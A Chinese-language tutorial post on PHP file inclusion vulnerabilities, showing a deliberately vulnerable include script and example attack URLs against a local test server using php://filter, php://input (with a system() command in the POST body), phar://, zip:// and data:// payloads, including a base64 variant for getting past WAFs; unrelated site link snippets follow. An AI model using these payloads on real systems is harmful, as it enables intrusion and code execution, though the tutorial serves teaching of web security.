文件包含漏洞

0x00前言在我们文件上传的时候,如果是白名单通常会配合到文件包含和解析漏洞来getshell,那么这里先来说说文件包含。0x01 文件包含漏洞在php当中的文件包含的内容都会被当作php

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

 0x00  前言

在我们文件上传的时候,如果是白名单通常会配合到文件包含和解析漏洞来getshell,那么这里先来说说文件包含。

0x01 文件包含漏洞

在php当中的文件包含的内容都会被当作php来执行,文件包含本来是个很常见的语法,在一些cms或者是网站源码里面都可以经常看到会包含到一个数据库文件用于连接数据库。直接的去包含一个文件是安全的,但一些开发人员为了灵活方便,去 动态的去包含一个文件的时候就造成了这么一个漏洞。

文件包含函数如下:

include()
include_once()
require()
require_once()

 

下面来编写一个简单的文件包含脚本

<?php $file = $_GET['file'];
include $file;
?>

 

这里get的方式接收file传参过来的内容,然后包含file传参过来的内容。

那么这时候我们如果上传了一个照片马的话,可以直接调用包含来包含我们的照片马,达到getshell的目的。


文件包含漏洞

这里包含了个txt文件,里面的内容直接被当作代码来执行了。

在文件包含当中也分为本地文件包含(LFI)和远程文件包含(RFI)

两者的区别在于本地文件包含只能包含本地的文件,需要上传图片马到对方服务器上,而远程文件包含可以直接调用远程的文件进行包含。但是远程文件包含的条件是:

allow_url_fopen = On    (默认开启)allow_url_include = On  (默认关闭)被包含的变量前没有目录的限制

文件包含漏洞

开启后能直接包含到远程的文件。

协议也可以直接包含文件,


文件包含漏洞

这里直接包含了一个c盘下的1.txt文件内容就可以被我们给显示出来了。

0x02 文件包含伪协议

文件包含的伪协议有如下:

file://    访问本地文件系统
http://    访问 HTTPs 网址
ftp://     访问 ftp URL
Php://     访问输入输出流
Zlib://    压缩流
Data:
//
Ssh2:// security shell2 Expect:// 处理交互式的流 Glob:// 查找匹配的文件路径 phar:// PHP 归档

 

file伪协议读取本地文件:

http://localhost/include/include.php?file=file://c:\1.txt

 

这里需要写入绝对路径 否则包含不了。

php伪协议利用:

php://伪协议主要分为input 和 filter,input 的利用条件是开启allow_url_include,而filter不需要。

http://127.0.0.1/include/include.php?file=php://filter/resource=../test/1.txt

 

使用文件包含读取源码

php://filter/read=convert.base64-encode/resource=include.php

 

这里使用base64加密后读取文件,如果直接读取php文件会失败,或者直接被执行。

php://input使用条件:

allow_url_include   为on

 

http://127.0.0.1/include/include.php?file=php://input

 

post传入数据

<?php system('ipconfig');?>

 


文件包含漏洞

phar://伪协议利用:

利用条件: php版本大于5.3

http://127.0.0.1/include/include.php?file=phar://phpinfo.rar/phpinfo.txt

 

这个方法在绕过一些waf上有一定的作用

zip://伪协议利用:

http://127.0.0.1/include/include.php?file=zip://phpinfo.rar%23phpinfo.txt

 

这里和前面的不同需要用到个#号

data://伪协议利用:

利用条件:

 
http://127.0.0.1/include/include.php?file=data://test/plain,<?php phpinfo();?>

 

这里还可以传入base64的值 有一直概率的绕过waf的拦截

http://127.0.0.1/include/include.php?file=data://test/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

 

  

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119967.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • .whl文件打开方式 Python「建议收藏」

    .whl文件打开方式 Python「建议收藏」wheel文件本质上就是zip或者rar,只不过他更加方便python的安装以及使用。在之前的图片中我们只要使用pipinstallwheel就可以安装wheel。在安装了wheel之后我们可以使使用pipinstallXXX.whl来安装.whl的文件了。(这里的XXX.whl是wheel文件的绝对路径)。至于pip的使用方法可以看一下博客另外可以尝试使用修改后缀文件属性名称方式进行

    2022年5月7日
    142
  • WeakHashMap理解

    WeakHashMap理解一、什么是WeakHashMap?从名字可以得知主要和Map有关,不过还有一个Weak,我们就更能自然而然的想到这里面还牵扯到一种弱引用结构,因此想要彻底搞懂,我们还需要知道四种引用。如果你已经知道了,可以跳过。1、四种引用在jvm中,一个对象如果不再被使用就会被当做垃圾给回收掉,判断一个对象是否是垃圾,通常有两种方法:引用计数法和可达性分析法。不管是哪一种方法判断一个对象是否是垃圾的条件总是一个对象的引用是都没有了。JDK.1.2之后,Java对引用的概念进行了扩充,将引用分为了:强引

    2022年5月31日
    49
  • 关于开源的RTP——jrtplib的使用

    关于开源的RTP——jrtplib的使用

    2021年11月17日
    42
  • mysql中text,longtext,mediumtext字段类型及区别

    mysql中text,longtext,mediumtext字段类型及区别 在Hibernate的配置中,我目前是采用Annotation的方式,不过原理应该都一样。对于如下的属性:Java代码private String dtaContent;    @Lob(type = LobType.CLOB, fetch = FetchType.LAZY)  

    2022年5月14日
    48
  • cobol语言基础教程_boo语言

    cobol语言基础教程_boo语言一、基础知识1.程序结构division-部section-节paragraphs-段2.四个部(1)IDENTIFICATIONDIVISION程序的标识部,位于程序的顶部,主要定义了程序的Id,作者等信息。(2)ENVIRONMENTDIVISION环境部声明了程序运行的环境,指定了程序的输入和输出文件,有两个节组成,配置节和输入输出节①配置节由两个段组成,分别是指定了程序编译的环境节(源计算机)和运行环境(目标计算机)②输入输出节由两个段组成分别是文

    2025年7月6日
    4
  • install application_installing

    install application_installinglmdbinstallation

    2022年9月29日
    4

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号